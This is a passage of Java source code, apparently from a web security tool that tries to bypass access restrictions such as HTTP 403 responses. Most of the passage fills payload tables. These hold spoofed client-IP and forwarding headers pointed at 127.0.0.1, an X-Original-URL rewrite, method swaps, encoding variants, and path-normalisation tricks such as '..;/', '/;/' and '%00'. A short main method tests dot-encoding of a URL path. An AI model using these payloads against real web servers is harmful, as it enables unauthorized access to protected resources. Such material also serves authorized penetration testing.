127.0.0.1"); 40 | this.HeaderPayload.put("X-Remote-IP","X-Remote-IP: 127.0.0.1"); 41 | this.HeaderPayload.put("X-Client-IP","X-Client-IP: 127.0.0.1"); 42 | this.HeaderPayload.put("X-Host","X-Host: 127.0.0.1"); 43 | this.HeaderPayload.put("X-Forwarded-Host","X-Forwarded-Host: 127.0.0.1"); 44 | this.HeaderPayload.put("X-Original-URL","/${path}"); 45 | this.HeaderPayload.put("Content-Length","Content-Length: 0"); 46 | this.HeaderPayload.put("X-ProxyUser-Ip","X-ProxyUser-Ip: 127.0.0.1"); 47 | this.HeaderPayload.put("Base-Url:","Base-Url: 127.0.0.1"); 48 | this.HeaderPayload.put("Client-IP","Client-IP: 127.0.0.1"); 49 | this.HeaderPayload.put("Http-Url","Http-Url: 127.0.0.1"); 50 | this.HeaderPayload.put("Proxy-Host","Proxy-Host: 127.0.0.1"); 51 | this.HeaderPayload.put("Proxy-Url","Proxy-Url: 127.0.0.1"); 52 | this.HeaderPayload.put("Real-Ip","Real-Ip: 127.0.0.1"); 53 | this.HeaderPayload.put("Redirect","Redirect: 127.0.0.1"); 54 | this.HeaderPayload.put("Request-Uri","Request-Uri: 127.0.0.1"); 55 | this.HeaderPayload.put("Uri","Uri: 127.0.0.1"); 56 | this.HeaderPayload.put("X-Forwarded-By","X-Forwarded-By: 127.0.0.1"); 57 | this.HeaderPayload.put("X-Forwarded-For-Original","X-Forwarded-For-Original: 127.0.0.1"); 58 | this.HeaderPayload.put("X-Forwarded-Server","X-Forwarded-Server: 127.0.0.1"); 59 | this.HeaderPayload.put("X-Forwarded","X-Forwarded: 127.0.0.1"); 60 | this.HeaderPayload.put("X-Forwarder-For","X-Forwarder-For: 127.0.0.1"); 61 | this.HeaderPayload.put("X-Http-Destinationurl","X-Http-Destinationurl: 127.0.0.1"); 62 | this.HeaderPayload.put("X-Http-Host-Override","X-Http-Host-Override: 127.0.0.1"); 63 | this.HeaderPayload.put("X-Original-Remote-Addr","X-Original-Remote-Addr: 127.0.0.1"); 64 | this.HeaderPayload.put("X-Proxy-Url","X-Proxy-Url: 127.0.0.1"); 65 | this.HeaderPayload.put("X-Real-Ip","X-Real-Ip: 127.0.0.1"); 66 | this.HeaderPayload.put("X-Remote-Addr","X-Remote-Addr: 127.0.0.1"); 67 | this.HeaderPayload.put("X-OReferrer","X-OReferrer: https%3A%2F%2Fwww.google.com%2F"); 68 | this.HeaderPayload.put("X-Forwarded-Scheme_http","X-Forwarded-Scheme: http"); 69 | this.HeaderPayload.put("X-Forwarded-Scheme_https","X-Forwarded-Scheme: https"); 70 | this.HeaderPayload.put("X-Forwarded-Port443","X-Forwarded-Port: 443"); 71 | this.HeaderPayload.put("X-Forwarded-Port4443","X-Forwarded-Port: 4443"); 72 | this.HeaderPayload.put("X-Forwarded-Port80","X-Forwarded-Port: 80"); 73 | this.HeaderPayload.put("X-Forwarded-Port8080","X-Forwarded-Port: 8080"); 74 | this.HeaderPayload.put("X-Forwarded-Port8443","X-Forwarded-Port: 8443"); 75 | 76 | 77 | this.ProtocolPayload.put("http","http"); 78 | this.ProtocolPayload.put("https","https"); 79 | this.ProtocolPayload.put("X-Forwarded-Scheme_http","X-Forwarded-Scheme: http"); 80 | this.ProtocolPayload.put("X-Forwarded-Scheme_https","X-Forwarded-Scheme: https"); 81 | 82 | this.PortPayload.put("X-Forwarded-Port443","X-Forwarded-Port: 443"); 83 | this.PortPayload.put("X-Forwarded-Port4443","X-Forwarded-Port: 4443"); 84 | this.PortPayload.put("X-Forwarded-Port80","X-Forwarded-Port: 80"); 85 | this.PortPayload.put("X-Forwarded-Port8080","X-Forwarded-Port: 8080"); 86 | this.PortPayload.put("X-Forwarded-Port8443","X-Forwarded-Port: 8443"); 87 | 88 | this.MethodPayload.put("GET","GET"); 89 | this.MethodPayload.put("POST","HEAD"); 90 | this.MethodPayload.put("OPTIONS","OPTIONS"); 91 | this.MethodPayload.put("PUT","PUT"); 92 | this.MethodPayload.put("TRACE","TRACE"); 93 | this.MethodPayload.put("PATCH","PATCH"); 94 | this.MethodPayload.put("TRACK","TRACK"); 95 | this.MethodPayload.put("UPDATE","UPDATE"); 96 | this.MethodPayload.put("LOCK","LOCK"); 97 | 98 | this.EncodePayload.put("Unicode","");//%u003b%u002f%u002e%u002e%u002f%u003b 99 | this.EncodePayload.put("URLEncode",""); 100 | this.EncodePayload.put("URLEncodeDouble",""); 101 | this.EncodePayload.put("Encode;",""); 102 | this.EncodePayload.put("Encode.",""); 103 | this.EncodePayload.put("EncodeDouble;",""); 104 | this.EncodePayload.put("EncodeDouble.",""); 105 | this.EncodePayload.put("Encode/",""); 106 | this.EncodePayload.put("Encode\\",""); 107 | this.EncodePayload.put("Encode;.",""); 108 | this.EncodePayload.put("Encode;\\",""); 109 | this.EncodePayload.put("Encode;/",""); 110 | this.EncodePayload.put("Encode\\/",""); 111 | this.EncodePayload.put("Encode./",""); 112 | this.EncodePayload.put("Encode.\\",""); 113 | this.EncodePayload.put("EncodeOnebyOne",""); //特定的字符OnebyOne 114 | 115 | //上面那些的基础上再来个单次url编码后 %单独编码一次 116 | // this.EncodePayload.put("1Encode;",""); 117 | // this.EncodePayload.put("1Encode.",""); 118 | // this.EncodePayload.put("1EncodeDouble;",""); 119 | // this.EncodePayload.put("1EncodeDouble.",""); 120 | // this.EncodePayload.put("1Encode/",""); 121 | // this.EncodePayload.put("1Encode\\",""); 122 | // this.EncodePayload.put("1Encode;.",""); 123 | // this.EncodePayload.put("1Encode;\\",""); 124 | // this.EncodePayload.put("1Encode;/",""); 125 | // this.EncodePayload.put("1Encode\\/",""); 126 | // this.EncodePayload.put("1Encode./",""); 127 | // this.EncodePayload.put("1Encode.\\",""); 128 | 129 | //分号编码 ..编码 分号双编码 ..双编码 斜杠 反斜杠 一起编码 一起双编码 单次url编码后 %单独编码 130 | this.MiscPayload.put("Tab","%09"); 131 | this.MiscPayload.put("Tab;","\t;"); 132 | this.MiscPayload.put("Tab..","\t.."); 133 | this.MiscPayload.put("Spach"," "); 134 | this.MiscPayload.put("%23?","#?"); 135 | this.MiscPayload.put("//","//"); 136 | this.MiscPayload.put("/","/"); 137 | this.MiscPayload.put("/..","/.."); 138 | this.MiscPayload.put("../","../"); 139 | this.MiscPayload.put("/ %23","/ #"); 140 | this.MiscPayload.put("/%23","/%23"); 141 | this.MiscPayload.put("/;/","/;/"); 142 | this.MiscPayload.put("/;//","/;//"); 143 | this.MiscPayload.put("/?","/?"); 144 | this.MiscPayload.put(";",";"); 145 | this.MiscPayload.put(";Tab",";\t"); 146 | this.MiscPayload.put(";/..",";/.."); 147 | this.MiscPayload.put(";/../..//",";/../..//"); 148 | this.MiscPayload.put(";///../",";///../"); 149 | this.MiscPayload.put("?%23","?%23"); 150 | this.MiscPayload.put("??","??"); 151 | this.MiscPayload.put("..",".."); 152 | this.MiscPayload.put("..\t","..\t"); 153 | this.MiscPayload.put("..%0d/;","..%0d/;"); 154 | this.MiscPayload.put("..%0d;/","..%0d;/"); 155 | this.MiscPayload.put("..\\/","..\\/"); 156 | this.MiscPayload.put("..%ff/;","..%ff/;"); 157 | this.MiscPayload.put("..%ff;/","..%ff;/"); 158 | this.MiscPayload.put("..;%0d","..;%0d"); 159 | this.MiscPayload.put("..;%ff","..;%ff"); 160 | this.MiscPayload.put("..;\\","..;\\"); 161 | this.MiscPayload.put("..;\\;","..;\\;"); 162 | this.MiscPayload.put("..\\;","..\\;"); 163 | this.MiscPayload.put("..;/","..;/"); 164 | this.MiscPayload.put("..;\\/","..;\\/"); 165 | this.MiscPayload.put("./","./"); 166 | this.MiscPayload.put(".\\",""); 167 | this.MiscPayload.put("/*","/*"); 168 | this.MiscPayload.put("\\*","\\*"); 169 | this.MiscPayload.put("/;/;/;/","/;/;/;/"); 170 | this.MiscPayload.put("/;a/;b/","/;a/;b/"); 171 | this.MiscPayload.put(".js",".js"); 172 | this.MiscPayload.put(".png",".png"); 173 | this.MiscPayload.put("%00","%00"); 174 | 175 | 176 | } 177 | 178 | public static void main(String[] args) throws UnsupportedEncodingException, MalformedURLException { 179 | String url = "http://aaa.com/aaa/bbb/..;/ccc?"; 180 | // String tmpurla = url.substring(url.indexOf("://")+3); 181 | // String tmphttp = url.substring(0,url.indexOf("://")+3); 182 | // System.out.println(tmphttp+URLEncoder.encode(URLEncoder.encode(tmpurla, "UTF-8"))); 183 | // System.out.println(new URL("http://aaa.com/aaa/bbb/..;/ccc").getPath()); 184 | 185 | String encodepath = new URL(url).getPath(); 186 | String encodeurl = url.substring(0,url.indexOf(encodepath))+encodepath.replace(".", "%2E"); 187 | 188 | System.out.println(encodeurl); 189 | // System.out.println(URLEncoder.encode(url, "UTF-8")); 190 | // String tmpurl = String.valueOf(new StringBuffer(url).reverse()); 191 | // String tmpurl1 = tmpurl.replaceFirst(".","*aa*"); 192 | // String tmpurl2 = new StringBuffer(tmpurl1).reverse().toString(); 193 | // 194 | // 195 | // System.out.println(tmpurl2.replace("*aa*","*/")); 196 | // System.out.println(tmpurl2.replace("*aa*","*/")); 197 | // 198 | // String tmpurla = url.substring(url.indexOf("://")+3); 199 | // String tmurlb = url.substring(0,url.indexOf("://")+3); 200 | // System.out.println(tmurlb+tmpurla.replace("/","/./")); 201 | } 202 | } 203 | --------------------------------------------------------------------------------